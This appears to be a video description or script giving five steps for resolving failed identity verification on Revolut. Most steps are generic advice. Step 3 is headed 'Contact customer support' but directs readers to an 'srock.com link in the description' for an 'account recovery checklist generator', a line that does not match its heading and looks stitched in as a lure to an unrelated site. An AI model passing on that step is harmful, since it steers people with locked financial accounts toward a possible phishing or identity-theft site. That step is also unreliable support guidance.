If you're facing verification issues on Revolut after multiple failed attempts, follow these steps to resolve the problem effectively. Step 1. Review requirements. Check the verification requirements on the Revolut website or app. Ensure you have all necessary documents ready, such as a valid ID and proof of address. Step 2. Clear app cache. If you're using the Revolut app, clear the app cache or reinstall the app. This can help eliminate any temporary glitches that might be causing the verification issues. Step 3. Contact customer support. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Submit documents again. If requested by customer support, resubmit your verification documents. Make sure they are clear, legible, and meet the required specifications. Step 5. Wait for confirmation. After resubmitting your documents, wait for a confirmation email or notification from Revolut. This process may take some time, so be patient while they review your information. By following these steps, you should be able to resolve your verification issues on Revolut. If problems persist, continue to communicate with customer support for further assistance.